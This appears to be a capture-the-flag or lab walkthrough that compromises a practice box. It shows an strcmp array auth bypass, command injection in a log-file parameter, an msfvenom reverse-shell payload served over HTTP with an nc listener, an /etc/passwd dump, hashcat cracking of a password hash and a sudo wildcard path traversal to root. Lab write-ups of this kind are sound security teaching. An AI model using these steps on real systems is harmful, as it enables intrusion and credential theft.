Alright, so, we’ve got another box to hack. Let’s scan it.
kali@kali:~/work$ nmap target -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 22:31 MDT
Nmap scan report for target (target)
Host is up (0.068s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2112/tcp open kip
Nmap done: 1 IP address (1 host up) scanned in 72.96 secondsNow, I don’t know what kip is, but I’m going to go ahead and press X to doubt.
kali@kali:~/work$ nmap target -p 2112 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 22:33 MDT
Nmap scan report for target (target)
Host is up (0.066s latency).
PORT STATE SERVICE VERSION
2112/tcp open ftp ProFTPD
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.64 seconds
That makes a lot more sense. Let’s see if we can login.
kali@kali:~/work$ ftp target -p 2112
Connected to target.
220 ProFTPD Server (Debian) [::ffff:target]
Name (target:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@me !
230-
230-The local time is: Mon Oct 28 04:37:00 2024
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||63952|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak
-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg
226 Transfer complete
ftp> get index.php.bak
local: index.php.bak remote: index.php.bak
229 Entering Extended Passive Mode (|||7250|)
150 Opening BINARY mode data connection for index.php.bak (901 bytes)
901 8.67 MiB/s
226 Transfer complete
901 bytes received in 00:00 (13.20 KiB/s)
ftp>We’re able to login as anonymous and download index.php.bak… that will probably help later.
The contents of index.php.bak are as follows:
<html>
<head></head>
<body>
<?php
$pass= "password"; //note Change this password regularly
if($_GET['login']==="1"){
if (strcmp($_POST['username'], "admin") == 0 && strcmp($_POST['password'], $pass) == 0) {
echo "Welcome! </br> Go to the <a href=\"dashboard.php\">dashboard</a>";
setcookie('pass', $pass, time() + 365*24*3600);
}else{
echo "<p>Bad login/password! </br> Return to the <a href=\"index.php\">login page</a> <p>";
}
exit();
}
?>
<form action="index.php?login=1" method="POST">
<h1>Login</h1>
<label><b>User:</b></label>
<input type="text" name="username" required>
</br>
<label><b>Password:</b></label>
<input type="password" name="password" required>
</br>
<input type="submit" id='submit' value='Login' >
</form>
</body>
</html>Let’s take a look at the HTTP service on port 80. There’s nothing interesting on the landing page, so let’s dir bust it.
kali@kali:~/work$ gobuster dir -u http://target -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://target
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 271]
/.htpasswd (Status: 403) [Size: 271]
/.htaccess (Status: 403) [Size: 271]
/admin (Status: 301) [Size: 300] [--> http://target/admin/]
/index.php (Status: 200) [Size: 245]
/server-status (Status: 403) [Size: 271]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================Sweet, let’s look at /admin. and WOOP, it’s the login page generated by index.php.bak.
Unfortunately, ‘admin’ and ‘password’ didn’t work for auth, so after much research, we learn strcmp() returns 0 if both strings match. Great and obvious, but if you pass a non-string as an argument, it may or may not return 0. Altering our login request to make password an array instead of a string, we’re able to login!
Awesome! Now, let’s check out dashboard.php.
Alright, so this page has a number of functions. We can list users (it’s just us), we can look at log files (nothing interesting), and we can ping 8.8.8.8.
I wasn’t able to get command injection using ping, so I took a look at logs in Burp Suite.
And… command injection.
Editing the file parameter, we can simply add a simicolon, then whatever we want. Let’s pop shell.
First, we create a reverse shell payload. We know the host is linux, so x86_64 ELF it is.
kali@kali:~/work$ msfvenom -p linux/x64/shell_reverse_tcp -f elf -o rshell LHOST=me LPORT=4444
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: rshellThen we host it via HTTP.
kali@kali:~/work$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...Now, we trick the target into downloading our payload, making it executable, and running it. Don’t forget to start a listener.
And just like that, we’re in. Let’s poke around.
kali@kali:~/work$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [me] from (UNKNOWN) [target] 48286
uname -a
Linux serv 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
florianges:x:1000:1000:florianges:/home/florianges:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
proftpd:x:112:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:113:65534::/srv/ftp:/usr/sbin/nologin
webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bashOwO, what’s dis??? Webadmin stores their password in /etc/passwd as an MD5 hash??? Let’s crack it!
kali@kali:~/work$ hashcat -m 500 webadmin.hash rockyou.txt
$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:dragonSSHing in as webadmin, we have access. Of course, we’re not through. We want root. One of the first things to check is what sudo access we have.
webadmin@serv:~$ sudo -l
[sudo] password for webadmin:
Matching Defaults entries for webadmin on serv:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on serv:
(ALL : ALL) /bin/nice /notes/*Alright, so we can run nice as root, and the asterisk is a misconfiguration issue.
webadmin@serv:~$ sudo /bin/nice /notes/../usr/bin/bash
root@serv:/home/webadmin# id
uid=0(root) gid=0(root) groups=0(root)And like that, we’re root.